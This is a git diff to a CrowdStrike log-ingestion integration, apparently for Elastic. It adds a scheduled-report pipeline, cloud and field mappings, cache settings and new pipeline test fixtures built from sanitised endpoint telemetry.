a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-mobile-detection-summary.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-mobile-detection-summary.log-expected.json index 93403c9f671..93325c49bd3 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-mobile-detection-summary.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-mobile-detection-summary.log-expected.json @@ -37,7 +37,7 @@ "malware" ], "created": "2022-04-04T08:30:56.000Z", - "id": 1310556238, + "id": "1310556238", "kind": "alert", "original": "{\n\t\"metadata\": {\n\t\t\"customerIDString\": \"0123456789ABCDEFGHIJKLMNOPQRSTUV\",\n\t\t\"offset\": 701283,\n\t\t\"eventType\": \"MobileDetectionSummaryEvent\",\n\t\t\"eventCreationTime\": 1649420269000,\n\t\t\"version\": \"1.0\"\n\t},\n\t\"event\": {\n\t\t\"SensorId\": \"85ae98xxxxxxd9a8f2\",\n\t\t\"MobileDetectionId\": 1310556238,\n\t\t\"ComputerName\": \"TESTComputer\",\n\t\t\"UserName\": \"TestUSER\",\n\t\t\"ContextTimeStamp\": 1649061056,\n\t\t\"DetectId\": \"0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|1310556238\",\n\t\t\"DetectName\": \"AppSideloadDetected\",\n\t\t\"DetectDescription\": \"Apps are installed from outside the PlayStore. Trigger based on a System callback when apps are installed or updated. \",\n\t\t\"Tactic\": \"Insecure security posture\",\n\t\t\"TacticId\": \"CSTA0009\",\n\t\t\"Technique\": \"Bad device settings\",\n\t\t\"TechniqueId\": \"CST0024\",\n\t\t\"Objective\": \"Falcon Detection Method\",\n\t\t\"Severity\": 50,\n\t\t\"FalconHostLink\": \"https://falcon.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|1310556238?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV\",\n\t\t\"MobileAppsDetails\": [{\n\t\t\t\"AppIdentifier\": \"com.facebook.katana\",\n\t\t\t\"AndroidAppLabel\": \"Facebook\",\n\t\t\t\"DexFileHashes\": \"abc456xxxxxxxxxxxxxxxxdef789\",\n\t\t\t\"ImageFileName\": \"/data/app/com.facebook.katana-djFExxxxxxxxxrkg==/base.apk\",\n\t\t\t\"AppInstallerInformation\": \"unknown\",\n\t\t\t\"IsBeingDebugged\": false,\n\t\t\t\"AndroidAppVersionName\": \"323.0.0.46.119\",\n\t\t\t\"IsContainerized\": false\n\t\t}]\n\t}\n}", "reference": "https://falcon.crowdstrike.com/mobile/detections/0123456789ABCDEFGHIJKLMNOPQRSTUV:ind:85ae98xxxxxxd9a8f2:41104|1310556238?_cid=0123456789ABCDEFGHIJKLMNOPQRSTUV", diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/cspm_events.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/cspm_events.yml index 2f44dcbda99..51234440dc7 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/cspm_events.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/cspm_events.yml @@ -42,33 +42,39 @@ processors: tag: rename_event_source - rename: field: crowdstrike.event.Severity - target_field: event.severity + target_field: event.severity ignore_missing: true tag: rename_severity - rename: field: crowdstrike.event.AccountId target_field: cloud.account.id ignore_missing: true + if: ctx.cloud?.account?.id == null + tag: rename_cloud_account_id - rename: field: crowdstrike.event.Region target_field: cloud.region ignore_missing: true + if: ctx.cloud?.region == null tag: rename_cloud_region #CSPMS uses Platform, CSPMIOA uses Provider - rename: field: crowdstrike.event.CloudProvider target_field: cloud.provider ignore_missing: true + if: ctx.cloud?.provider == null tag: rename_cloud_provider - rename: field: crowdstrike.event.CloudPlatform target_field: cloud.provider ignore_missing: true + if: ctx.cloud?.provider == null tag: rename_cloud_platform - rename: field: crowdstrike.event.CloudService target_field: cloud.service.name ignore_missing: true + if: ctx.cloud?.service?.name == null tag: rename_cloud_service - rename: field: crowdstrike.event.PolicyStatement diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/default.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/default.yml index 4f8d02086aa..9957d1b2728 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/default.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/default.yml @@ -253,6 +253,10 @@ processors: name: '{{ IngestPipeline "remote_response_session_end" }}' tag: pipeline_remote_response_session_end if: ctx.crowdstrike?.metadata?.eventType == "RemoteResponseSessionEndEvent" + - pipeline: + name: '{{ IngestPipeline "scheduled_report_notification_event" }}' + tag: pipeline_scheduled_report_notification_event + if: ctx.crowdstrike?.metadata?.eventType == "ScheduledReportNotificationEvent" - set: field: user.email copy_from: user.name diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/firewall_match.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/firewall_match.yml index 09b9c1e63aa..2d378dddb5d 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/firewall_match.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/firewall_match.yml @@ -14,7 +14,7 @@ processors: - append: field: event.type value: - - start + - start - connection tag: append_start_connection_type - append: @@ -164,7 +164,11 @@ processors: ignore_missing: true tag: convert_remote_port if: ctx.crowdstrike?.event?.RemotePort != null && ctx.network?.direction == "egress" - + - rename: + field: crowdstrike.event.Platform + target_field: host.os.platform + ignore_missing: true + tag: rename_Platform on_failure: - append: field: error.message diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/identity_protection_incident.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/identity_protection_incident.yml index ef3cfb5022a..9228595f4b5 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/identity_protection_incident.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/identity_protection_incident.yml @@ -34,7 +34,7 @@ processors: tag: rename_identity_protection_incident_id - rename: field: crowdstrike.event.FalconHostLink - target_field: event.reference + target_field: event.reference ignore_missing: true tag: rename_falcon_host_link - rename: @@ -42,6 +42,11 @@ processors: target_field: user.name ignore_missing: true tag: rename_user_name + - dissect: + if: ctx.user?.name != null && ctx.user.name.contains('\\') + tag: dissect_user_name + field: user.name + pattern: '%{user.domain}\%{user.name}' - rename: field: crowdstrike.event.EndpointName target_field: host.hostname diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/mobile_detection_summary.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/mobile_detection_summary.yml index 95000aee4fa..3c6c26b647b 100644 --- a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/mobile_detection_summary.yml +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/mobile_detection_summary.yml @@ -41,6 +41,11 @@ processors: target_field: event.id ignore_missing: true tag: rename_mobile_detect_id + - convert: + field: event.id + type: string + ignore_missing: true + tag: convert_event_id_to_string - rename: field: crowdstrike.event.DetectId target_field: rule.id @@ -56,7 +61,7 @@ processors: target_field: rule.description ignore_missing: true tag: rename_detect_description - - set: + - set: field: threat.framework value: MITRE ATT&CK - append: @@ -81,7 +86,7 @@ processors: if: ctx.crowdstrike?.event?.TacticId != null - rename: field: crowdstrike.event.ComputerName - target_field: host.name + target_field: host.name ignore_missing: true tag: rename_computer_name - rename: @@ -91,12 +96,12 @@ processors: tag: rename_user_name - rename: field: crowdstrike.event.FalconHostLink - target_field: event.reference + target_field: event.reference ignore_missing: true tag: rename_falcon_host_link - rename: field: crowdstrike.event.Severity - target_field: event.severity + target_field: event.severity ignore_missing: true tag: rename_severity - rename: diff --git a/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/scheduled_report_notification_event.yml b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/scheduled_report_notification_event.yml new file mode 100644 index 00000000000..1dcf0ceccc6 --- /dev/null +++ b/packages/crowdstrike/data_stream/falcon/elasticsearch/ingest_pipeline/scheduled_report_notification_event.yml @@ -0,0 +1,60 @@ +--- +description: Pipeline for processing Scheduled Report Notification Event. +processors: + - set: + field: event.kind + value: event + - date: + field: crowdstrike.event.ExecutionMetadata.ExecutionStart + timezone: UTC + formats: + - UNIX_MS + tag: date_utc_timestamp + if: 'ctx.crowdstrike?.event?.ExecutionMetadata?.ExecutionStart != null && String.valueOf(ctx.crowdstrike.event.ExecutionMetadata.ExecutionStart).length() >= 12' + - date: + field: crowdstrike.event.ExecutionMetadata.SearchWindowStart + timezone: UTC + formats: + - UNIX_MS + tag: date_utc_timestamp + if: 'ctx.crowdstrike?.event?.ExecutionMetadata?.SearchWindowStart != null && String.valueOf(ctx.crowdstrike.event.ExecutionMetadata.SearchWindowStart).length() >= 12' + - date: + field: crowdstrike.event.ExecutionMetadata.SearchWindowEnd + timezone: UTC + formats: + - UNIX_MS + tag: date_utc_timestamp + if: 'ctx.crowdstrike?.event?.ExecutionMetadata?.SearchWindowEnd != null && String.valueOf(ctx.crowdstrike.event.ExecutionMetadata.SearchWindowEnd).length() >= 12' + - convert: + field: crowdstrike.event.ExecutionMetadata.ExecutionDuration + type: long + tag: convert_ExecutionDuration + ignore_missing: true + - convert: + field: crowdstrike.event.ExecutionMetadata.ResultCount + type: long + tag: convert_ResultCount + ignore_missing: true + - rename: + field: crowdstrike.event.UserID + target_field: user.id + ignore_missing: true + tag: rename_userID + - dissect: + if: ctx.user?.id != null && ctx.user.id.contains('@') + tag: dissect_user_id + field: user.id + pattern: '%{user.name}@%{user.domain}' + - convert: + field: crowdstrike.event.Status + type: string + tag: convert_Status + ignore_missing: true +on_failure: + - append: + field: error.message + value: |- + Processor "{{ _ingest.on_failure_processor_type }}" with tag "{{ _ingest.on_failure_processor_tag }}" in pipeline "{{ _ingest.on_failure_pipeline }}" failed with message "{{ _ingest.on_failure_message }}" + - set: + field: event.kind + value: pipeline_error diff --git a/packages/crowdstrike/data_stream/falcon/fields/fields.yml b/packages/crowdstrike/data_stream/falcon/fields/fields.yml index d8b555cef0c..1caaec6c98e 100644 --- a/packages/crowdstrike/data_stream/falcon/fields/fields.yml +++ b/packages/crowdstrike/data_stream/falcon/fields/fields.yml @@ -22,6 +22,16 @@ title: Event fields type: group fields: + - name: AccountId + type: keyword + - name: AgentIdString + type: keyword + - name: CloudPlatform + type: keyword + - name: CloudProvider + type: keyword + - name: CloudService + type: keyword - name: IncidentType type: keyword description: | @@ -38,6 +48,39 @@ type: keyword description: | Data domains of the event that was the primary indicator or created it. + - name: ExecutionID + type: keyword + - name: ExecutionMetadata + type: group + fields: + - name: ExecutionDuration + type: long + - name: ExecutionStart + type: date + - name: ReportFileName + type: keyword + - name: ResultCount + type: long + - name: ResultID + type: keyword + - name: SearchWindowEnd + type: date + - name: SearchWindowStart + type: date + - name: Region + type: keyword + - name: ReportFileReference + type: keyword + - name: ReportID + type: keyword + - name: ReportName + type: keyword + - name: ReportType + type: keyword + - name: StatusMessage + type: keyword + - name: UserUUID + type: keyword - name: ActivityId type: keyword description: | diff --git a/packages/crowdstrike/data_stream/falcon/manifest.yml b/packages/crowdstrike/data_stream/falcon/manifest.yml index 29fc804f026..6f1a96ca600 100644 --- a/packages/crowdstrike/data_stream/falcon/manifest.yml +++ b/packages/crowdstrike/data_stream/falcon/manifest.yml @@ -2,6 +2,7 @@ type: logs title: Crowdstrike falcon logs streams: - input: logfile + enabled: false vars: - name: paths type: text diff --git a/packages/crowdstrike/data_stream/falcon/sample_event.json b/packages/crowdstrike/data_stream/falcon/sample_event.json index b9ef09dbc28..ffc1cb8d9c0 100644 --- a/packages/crowdstrike/data_stream/falcon/sample_event.json +++ b/packages/crowdstrike/data_stream/falcon/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2020-02-12T21:29:10.000Z", "agent": { - "ephemeral_id": "6b7924ba-f695-422a-a296-d1092ff909e4", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "fe495f50-2dbf-43ee-9c49-b35ef8bf9235", + "id": "df7cb44a-7978-449c-992e-c6b22e788ae9", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.11.0" }, "crowdstrike": { "event": { @@ -50,9 +50,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "df7cb44a-7978-449c-992e-c6b22e788ae9", "snapshot": false, - "version": "8.10.1" + "version": "8.11.0" }, "event": { "action": [ @@ -64,7 +64,7 @@ ], "created": "2020-02-12T21:29:10.710Z", "dataset": "crowdstrike.falcon", - "ingested": "2023-09-26T13:19:10Z", + "ingested": "2024-01-29T08:59:16Z", "kind": "event", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 0,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581542950710,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"api-client-id:1234567890abcdefghijklmnopqrstuvwxyz\",\n \"UserIp\": \"10.10.0.8\",\n \"OperationName\": \"streamStarted\",\n \"ServiceName\": \"Crowdstrike Streaming API\",\n \"Success\": true,\n \"UTCTimestamp\": 1581542950,\n \"AuditKeyValues\": [\n {\n \"Key\": \"APIClientID\",\n \"ValueString\": \"1234567890abcdefghijklmnopqr\"\n },\n {\n \"Key\": \"partition\",\n \"ValueString\": \"0\"\n },\n {\n \"Key\": \"offset\",\n \"ValueString\": \"-1\"\n },\n {\n \"Key\": \"appId\",\n \"ValueString\": \"siem-connector-v2.0.0\"\n },\n {\n \"Key\": \"eventType\",\n \"ValueString\": \"[UserActivityAuditEvent HashSpreadingEvent RemoteResponseSessionStartEvent RemoteResponseSessionEndEvent DetectionSummaryEvent AuthActivityAuditEvent]\"\n }\n ]\n }\n}", "outcome": "success" diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log index d906f160ab4..27e0440f31a 100644 --- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log +++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log @@ -127,4 +127,5 @@ {"ProcessCreateFlags":"1024","IntegrityLevel":"8192","ParentProcessId":"434985540832797032","SourceProcessId":"434985540832797032","aip":"89.160.20.120","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-4084637156-299436391-3671333128-115430","event_platform":"Win","TokenType":"2","ProcessEndTime":"","ParentBaseFileName":"EmUser.exe","ImageSubsystem":"2","id":"9686a6b3-1d39-11ed-9370-0660bfa16adf","EffectiveTransmissionClass":"3","SessionId":"1","Tags":"25, 27, 862, 874, 924, 12094627905582, 12094627906234","timestamp":"1660636869410","event_simpleName":"ProcessRollup2","RawProcessId":"6108","ConfigStateHash":"518095218","MD5HashData":"e570911fc2ab74ecf0dc59f324318f6e","SHA256HashData":"f470180a4f67ebd944570b3eaf040caa8c0713252c6228e60c413714375ccfe2","ProcessSxsFlags":"64","AuthenticationId":"29530993","ConfigBuild":"1007.3.0015103.1","CommandLine":"\"C:\\Program Files\\nirsoft\\SoundVolumeView.exe\" /SetDefault \"Teradici Virtual Audio Driver\\device\\speakers\\\" all","ParentAuthenticationId":"29530993","TargetProcessId":"434985669758362104","ImageFileName":"\\Device\\HarddiskVolume3\\Program Files\\NirSoft\\SoundVolumeView.exe","SourceThreadId":"434985668331321297","Entitlements":"15","name":"ProcessRollup2V19","ProcessStartTime":"1660636868.576","ProcessParameterFlags":"24577","aid":"50deaa55144543089a1f463b568cdc53","cid":"1301ac65ae144fbb9689a8472f828c2e"} {"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":133145666190000000,"EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812","StartTime":133145665200000000,"EndTime":133145665200000000} {"ComputerName":"HQ-sadhkbasHS","CurrentLocalIP":"67.43.156.13","FirstDiscoveredDate":"1669625277.827","LastDiscoveredBy":"c1b74438660b44cfa93e24c9d44badab","LocalAddressIP4":"67.43.156.13","MAC":"AA-AA-AA-AA-AA-AA","MACPrefix":"AA-AA-AA","NeighborName":"!!!!UNKNOWN!!!!","__mv_LocalAddressIP4":"","__mv_aip":"$67.43.156.14$;$67.43.156.13$","__mv_discoverer_aid":"$4b8f58d3f5f040b3804d3820ca2aed67$;$c1b74438660b44cfa93e24c9d44badab$","__mv_discoverer_devicetype":"","_time":"1678931820.343","aip":"67.43.156.13 67.43.156.14 81.2.69.192","aipCount":"3","cid":"500c5073b4d7443688f4b32c5eeb295b","discovererCount":"2","discoverer_aid":"4b8f58d3f5f040b3804d3820ca2aed67 c1b74438660b44cfa93e24c9d44badab","discoverer_devicetype":"","localipCount":"1","subnet":"10.0"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812","StartTime":133145665200000000,"EndTime":133145665200000000} \ No newline at end of file +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812","StartTime":133145665200000000,"EndTime":133145665200000000} +{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"c:\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"} diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json index e78bd4c2337..8c756bf8489 100644 --- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json +++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json @@ -11775,6 +11775,98 @@ "url": { "scheme": "http" } + }, + { + "@timestamp": "2020-11-08T15:57:10.593Z", + "crowdstrike": { + "AuthenticationId": "703298", + "ConfigStateHash": "2642284486", + "EffectiveTransmissionClass": "3", + "Entitlements": "15", + "FileEcpBitmask": "0", + "FileObject": "18446664963104449168", + "IrpFlags": "1028", + "IsOnNetwork": "0", + "IsOnRemovableDisk": "1", + "MajorFunction": "18", + "MinorFunction": "0", + "OperationFlags": "0", + "TokenType": "1", + "cid": "ffffffff30a3407dae27d0503611022d", + "name": "GenericFileWrittenV11" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "GenericFileWritten", + "created": "2020-11-08T15:57:11.298Z", + "id": "ffffffff-1111-11eb-800a-06cecfd73923", + "original": "{\"AuthenticationId\":\"703298\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2642284486\",\"ContextProcessId\":\"1161025471861\",\"ContextThreadId\":\"34929528116709\",\"ContextTimeStamp\":\"1604851030.593\",\"DiskParentDeviceInstanceId\":\"USB\\\\VID_1058\\u0026PID_2621\\\\57583431453939315A4C5255\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"262fbc677256cf4c8d6c6a227285a072c06830873b000000\",\"FileObject\":\"18446664963104449168\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"1\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"517029\",\"TargetFileName\":\"c:\\\\Device\\\\HarddiskVolume5\\\\01.png.tmp$$\",\"TokenType\":\"1\",\"UserName\":\"user9\",\"aid\":\"ffffffff16bf4c7bb5ad755a4722025c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"GenericFileWritten\",\"id\":\"ffffffff-1111-11eb-800a-06cecfd73923\",\"name\":\"GenericFileWrittenV11\",\"timestamp\":\"1604851031298\"}" + }, + "file": { + "device": "USB\\VID_1058&PID_2621\\57583431453939315A4C5255", + "directory": "c:\\Device\\HarddiskVolume5", + "drive_letter": "C", + "extension": "tmp$$", + "inode": "262fbc677256cf4c8d6c6a227285a072c06830873b000000", + "name": "01.png.tmp$$", + "path": "c:\\Device\\HarddiskVolume5\\01.png.tmp$$", + "size": 517029, + "type": "file" + }, + "host": { + "os": { + "type": "windows" + } + }, + "observer": { + "address": [ + "67.43.156.13" + ], + "geo": { + "continent_name": "Asia", + "country_iso_code": "BT", + "country_name": "Bhutan", + "location": { + "lat": 27.5, + "lon": 90.5 + } + }, + "ip": [ + "67.43.156.13" + ], + "serial_number": "ffffffff16bf4c7bb5ad755a4722025c", + "type": "agent", + "vendor": "crowdstrike", + "version": "1007.3.0011603.1" + }, + "process": { + "entity_id": "1161025471861", + "thread": { + "id": 34929528116709 + } + }, + "related": { + "hash": [ + "2642284486" + ], + "ip": [ + "67.43.156.13" + ], + "user": [ + "user9" + ] + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "scheme": "http" + }, + "user": { + "name": "user9" + } } ] } \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/fdr/agent/stream/aws-s3.yml.hbs b/packages/crowdstrike/data_stream/fdr/agent/stream/aws-s3.yml.hbs index 0d28cf13fe2..32e9ed1d8bd 100644 --- a/packages/crowdstrike/data_stream/fdr/agent/stream/aws-s3.yml.hbs +++ b/packages/crowdstrike/data_stream/fdr/agent/stream/aws-s3.yml.hbs @@ -69,8 +69,10 @@ processors: then: - cache: backend: + capacity: {{metadata_cache_capacity}} file: id: aidmaster + write_interval: {{metadata_cache_write_interval}} put: ttl: {{metadata_ttl}} key_field: crowdstrike.aid @@ -89,8 +91,10 @@ processors: then: - cache: backend: + capacity: {{metadata_cache_capacity}} file: id: userinfo + write_interval: {{metadata_cache_write_interval}} put: ttl: {{metadata_ttl}} key_field: crowdstrike.UserSid_readable diff --git a/packages/crowdstrike/data_stream/fdr/agent/stream/stream.yml.hbs b/packages/crowdstrike/data_stream/fdr/agent/stream/stream.yml.hbs index 6a03a208a20..dbe321a4d42 100644 --- a/packages/crowdstrike/data_stream/fdr/agent/stream/stream.yml.hbs +++ b/packages/crowdstrike/data_stream/fdr/agent/stream/stream.yml.hbs @@ -34,8 +34,10 @@ processors: then: - cache: backend: + capacity: {{metadata_cache_capacity}} file: id: aidmaster + write_interval: {{metadata_cache_write_interval}} put: ttl: {{metadata_ttl}} key_field: crowdstrike.aid @@ -54,8 +56,10 @@ processors: then: - cache: backend: + capacity: {{metadata_cache_capacity}} file: id: userinfo + write_interval: {{metadata_cache_write_interval}} put: ttl: {{metadata_ttl}} key_field: crowdstrike.UserSid_readable diff --git a/packages/crowdstrike/data_stream/fdr/elasticsearch/ingest_pipeline/default.yml b/packages/crowdstrike/data_stream/fdr/elasticsearch/ingest_pipeline/default.yml index 867d28cc27b..eb3998f8d0f 100644 --- a/packages/crowdstrike/data_stream/fdr/elasticsearch/ingest_pipeline/default.yml +++ b/packages/crowdstrike/data_stream/fdr/elasticsearch/ingest_pipeline/default.yml @@ -2327,8 +2327,8 @@ processors: ctx.file.extension = ctx.file.name.substring(extIdx+1); } } - if (path.charAt(1) == ":") { - ctx.file.drive_letter = path.charAt(0).toUpperCase(); + if (path.indexOf(':') == 1) { + ctx.file.drive_letter = path.substring(0, 1).toUpperCase(); } - rename: field: _temp.hashes diff --git a/packages/crowdstrike/data_stream/fdr/fields/ecs.yml b/packages/crowdstrike/data_stream/fdr/fields/ecs.yml index 7b4faf503d4..4c5f6667933 100644 --- a/packages/crowdstrike/data_stream/fdr/fields/ecs.yml +++ b/packages/crowdstrike/data_stream/fdr/fields/ecs.yml @@ -58,6 +58,8 @@ name: file.device - external: ecs name: file.directory +- external: ecs + name: file.drive_letter - external: ecs name: file.extension - external: ecs @@ -80,8 +82,12 @@ name: host.geo.country_name - external: ecs name: host.geo.timezone +- external: ecs + name: host.domain - external: ecs name: host.hostname +- external: ecs + name: host.ip - external: ecs name: host.name - external: ecs diff --git a/packages/crowdstrike/data_stream/fdr/manifest.yml b/packages/crowdstrike/data_stream/fdr/manifest.yml index 7bce014910b..e57277d8dca 100644 --- a/packages/crowdstrike/data_stream/fdr/manifest.yml +++ b/packages/crowdstrike/data_stream/fdr/manifest.yml @@ -5,6 +5,7 @@ streams: template_path: aws-s3.yml.hbs title: Falcon Data Replicator logs description: Collect Falcon Data Replicator logs using s3 input + enabled: false vars: - name: access_key_id type: text @@ -12,18 +13,21 @@ streams: multi: false required: false show_user: true + secret: false - name: secret_access_key - type: text + type: password title: Secret Access Key multi: false required: false show_user: true + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true + secret: true - name: queue_url type: text title: Queue URL @@ -64,6 +68,22 @@ streams: type: text multi: false default: 168h + - name: metadata_cache_capacity + required: true + show_user: false + title: Metadata cache capacity + description: "The maximum amount of metadata objects to cache. Operations that would cause the capacity to be exceeded will result in evictions of the oldest elements. The capacity should not be lower than the number of elements that are expected to be referenced when processing the input as evicted elements are lost. Values at or below zero indicate no limit. \nWARNING: This setting needs to be set only if the amount of metadata elements is known beforehand, otherwise it might lead to enrichment data loss. If you are not sure, leave it untouched.\n" + type: text + multi: false + default: 0 + - name: metadata_cache_write_interval + required: true + show_user: false + title: Metadata cache write interval + description: The interval between periodic cache writes to the backing file. Valid time units are h, m, s, ms, us/µs and ns. The contents are always written out to the backing file when the processor is closed. Default is zero, no periodic writes. + type: text + multi: false + default: 0 - name: preserve_original_event required: true show_user: true @@ -208,6 +228,7 @@ streams: - input: logfile title: Falcon Data Replicator logs description: Collect Falcon Data Replicator logs using a log file + enabled: false vars: - name: paths type: text diff --git a/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-common-config.yml b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..be41bb0d476 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,4 @@ +fields: + tags: + - preserve_original_event + - preserve_duplicate_custom_fields diff --git a/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log new file mode 100644 index 00000000000..6c33d8dc435 --- /dev/null +++ b/packages/crowdstrike/data_stream/host/_dev/test/pipeline/test-host.log @@ -0,0 +1 @@ +{"agent_load_flags":"0","agent_local_time":"2023-11-07T04:51:16.678Z","agent_version":"7.05.17603.0","bios_manufacturer":"ABCInc.","bios_version":"2020.0.1.0.0(iBridge:22.11.000.0.0,0)","chassis_type":"9","chassis_type_desc":"Laptop","cid":"92012896127c4948236ba7601b886b0","config_id_base":"6594763","config_id_build":"1703","config_id_platform":"4","connection_ip":"81.2.69.192","cpu_signature":"460517","device_id":"3114433dbce478ca48d9a828b9b34be","device_policies":{"device_control":{"applied":true,"applied_date":"2023-06-20T08:45:26.341093915Z","assigned_date":"2023-06-20T08:43:47.736146738Z","policy_id":"2f88daf0177f467dae69262a5ce71775","policy_type":"device-control"},"firewall":{"applied":true,"applied_date":"2023-09-11T10:33:44.174488832Z","assigned_date":"2023-09-11T10:32:47.853976945Z","policy_id":"1ee301f7e3e24e96ad6a23c73aaac1e3","policy_type":"firewall","rule_set_id":"1ee301f7e3e24e96ad6a23c73aaac1e3"},"global_config":{"applied":true,"a